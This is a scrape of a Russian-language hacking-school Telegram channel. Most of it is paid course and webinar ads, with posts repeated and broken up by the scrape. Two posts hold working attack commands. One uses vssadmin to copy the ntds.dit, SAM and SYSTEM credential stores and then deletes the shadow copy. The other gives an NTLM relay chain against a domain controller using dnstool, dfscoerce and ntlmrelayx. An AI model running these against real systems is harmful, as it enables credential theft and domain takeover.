Направление: Дата-инжиниринг и квантизация моделей 💰 Условия:
💸 Вход в поток - 10 000 ₽
(140$)
💵 Занятие - 5 000 ₽ (70$)
Платишь только за те сессии, на которые приходишь.
⏱️ Формат:
онлайн • практика • лаборатории
🎓 После обучения : сертификат об окончании курсов ( не путать с повышением квалификации)
Количество мест ограничено.
📩 Запись:
@HKVD_A
@ruhack_school
💸 Вход в поток - 10 000 ₽
(140$)
💵 Занятие - 5 000 ₽ (70$)
Платишь только за те сессии, на которые приходишь.
⏱️ Формат:
онлайн • практика • лаборатории
🎓 После обучения : сертификат об окончании курсов ( не путать с повышением квалификации)
Количество мест ограничено.
📩 Запись:
@HKVD_A
@ruhack_school
❤4❤🔥1
На первом этапе инициируем создание снимка командой с указанием целевого тома.
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\NTDS\ntds.dit C:\temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\System32\config\SAM C:\temp\SAM
vssadmin delete shadows /for=C: /quiet
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤🔥1
⚡️ Вебинар в это воскресенье
🕵️ OSINT: как находят людей, инфраструктуру и скрытые связи в интернете
Разберём реальные методы, которые используют аналитики и специалисты по киберразведке.
На вебинаре:
• поиск по никнеймам и цифровому следу
• анализ соцсетей и утечек
• поиск по фото и геолокации
• инструменты OSINT-аналитиков
🗓 Воскресенье, 26 апреля
🕢 19:30 (МСК)
📍 Онлайн : Salute Jazz
Длительность: ~1-1.5 часа
Участие - Бесплатно ✅
@ruhack_school
🕵️ OSINT: как находят людей, инфраструктуру и скрытые связи в интернете
Разберём реальные методы, которые используют аналитики и специалисты по киберразведке.
На вебинаре:
• поиск по никнеймам и цифровому следу
• анализ соцсетей и утечек
• поиск по фото и геолокации
• инструменты OSINT-аналитиков
🗓 Воскресенье, 26 апреля
🕢 19:30 (МСК)
📍 Онлайн : Salute Jazz
Длительность: ~1-1.5 часа
Участие - Бесплатно ✅
@ruhack_school
🔥2
🔴 Суббота 19:30 : Вебинар по хакингу и вскрытию периметра
Расскажем о методиках проникновения в инфраструктуру 🖨
На стриме:
• как находить дырявые сайты в дикой природе
• разведка: домены, сабдомены, то что спрятано
• скрытые админки и API: находим за минуты
• тулкит который реально юзают на заказах, а не из первой ссылки гугла
• разбор боевых кейсов: от первого запроса до "мы внутри"
Не важно новичок ты или уже что-то умеешь - после этого вебинара ты будешь видеть сайты по-другому.
🎤 2 спикера - практики, параллельно лекторы
📍 Онлайн
💰 1000₽ / $15
📩 Запись: @HKVD_A
Расскажем о методиках проникновения в инфраструктуру 🖨
На стриме:
• как находить дырявые сайты в дикой природе
• разведка: домены, сабдомены, то что спрятано
• скрытые админки и API: находим за минуты
• тулкит который реально юзают на заказах, а не из первой ссылки гугла
• разбор боевых кейсов: от первого запроса до "мы внутри"
Не важно новичок ты или уже что-то умеешь - после этого вебинара ты будешь видеть сайты по-другому.
🎤 2 спикера - практики, параллельно лекторы
📍 Онлайн
💰 1000₽ / $15
📩 Запись: @HKVD_A
🔥2
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2026 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
@ruhack_school
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2026 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
@ruhack_school
👍3
С Днём Победы.
9 Мая напоминает, что решимость, дисциплина и единство меняют ход истории. Тогда герои защищали Родину на земле и в небе. Сегодня новое поле битвы проходит в цифровом пространстве.
Помним подвиг предков.
Уважаем силу разума.
Развиваем навыки, чтобы быть готовыми к любым вызовам!
С праздником, с 9 Мая 🔥🇷🇺
9 Мая напоминает, что решимость, дисциплина и единство меняют ход истории. Тогда герои защищали Родину на земле и в небе. Сегодня новое поле битвы проходит в цифровом пространстве.
Помним подвиг предков.
Уважаем силу разума.
Развиваем навыки, чтобы быть готовыми к любым вызовам!
С праздником, с 9 Мая 🔥🇷🇺
🔥4